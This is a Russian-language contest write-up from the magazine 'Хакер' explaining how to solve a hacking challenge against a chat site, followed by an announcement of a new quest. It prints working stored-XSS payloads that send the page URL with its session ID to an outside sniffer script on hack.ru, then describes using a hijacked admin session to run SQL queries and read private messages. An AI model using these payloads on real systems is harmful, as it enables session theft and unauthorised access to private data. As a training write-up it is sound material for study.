Х-конкурс

Bloodex

Хакер, номер #071, стр. 071-077-1

(bloodex@severgallery.com)

Для тех, кто весь месяц не спал, ночами думая о том, как же все-таки пройти октябрьский конкурс, кратко объясню суть. Поскольку исходники чата были доступны для всех, ты первым делом должен был тщательнейшем образом проверить их на наличие багов. Если ты внимательно смотрел код скрипта reg.php, то наверняка увидел, что параметр $image, содержащий URL картинки, не фильтруется на наличие плохих символов типа «<» и «> ». Это означает, что мы можем реализовать CSS-нападение в чате. Если мы порегаемся под ником hacker и в инфо о себе укажем URL своей фотографии, скажем, http://hack.ru/morda.jpg, то на странице users.php появится новая строка, содержащая тэг <img name=”hacker” src=http://hack.ru/morda.jpg”> . Посмотри, что было бы, если бы ты ввел при регистрации URL http://hack.ru/morda.jpg?”> <script> document[‘hacker’].src=”http://hack.ru/hack.php?location=”+document.location;</script> <img”, где hack.php - скрипт, сохраняющий в файл параметр location. Этот параметр, в свою очередь, содержит URL текущей страницы, из которого без труда можно вытащить идентификатор сессии облапошенного пользователя.

Через некоторое время в комнату чата зайдет модератор, и сниффер hack.php тут же сохранит содержимое адресной строки его браузера. Известно, что sid модератора начинается с abcdef, поэтому из файла, куда hack.php записывает урлы, можно быстро выудить адрес

http://chat.padonak.ru/users.php?sid=abcdef6a08f7de86a5124d7e9cd2f5fa, зайдя по которому, ты залогиниваешься с правами модератора. Теперь из панели управления ты можешь послать жалобу админу, которая также будет содержать яваскрипт, скажем, такого содержания: <script> document.location=”http://hack.ru/hack.php?location=ADMIN:”+document.location</script> . Когда администратор приступит к чтению накопившихся сообщений, в твоем файлике появится такая строка:

ADMIN:http://chat.padonak.ru/admin/read.php?sid=9cbabb5e2ee4a7d3eee203c5db18cdc0. А теперь посмотри сорцы чата. В каталоге admin помимо файла read.php есть еще и другие скрипты. Обрати внимание на sqlquery.php. Зайдя на

http://chat.padonak.ru/admin/sqlquery.php?sid=9cbabb5e2ee4a7d3eee203c5db18cdc0, ты получаешь доступ к MySQL-коммандеру. Помучив его немного, ты узнаешь имена таблиц базы данных. После этого ты исполняешь запрос SELECT * FROM lgh123_msg WHERE lgh123_rid=3(lgh123_rid - идентификатор приватной комнаты). Мускул-коммандер послушно выведет тебе разговор падонкафф, из которого ты узнаешь номер ICQ-уина одного из них, ящик, на который высылаются пароли, и ответ на контрольный вопрос в службе восстановления пароля к этому ящику. Вот и все, а ты боялся! :)

Теперь о новом испытании, которое тебе предстоит. Обычно наши конкурсы рассчитаны на маститых профи, так что среднему читателю их пройти очень сложно. С одной стороны, это правильно: только лучшие умы должны получать призы, но с другой - ведь всем хочется размять залежи серого вещества в своей черепной коробке. Именно поэтому в этом номере тебя (как, впрочем, и всех остальных читателей) ждет квест. Для его прохождения тебе не понадобится никаких знаний в области хака. Требуется только смекалка, внимание и умение нестандартно (читай извращенно) мыслить. Вот и все, а об остальном читай 22-го ноября на сайте padonak.ru.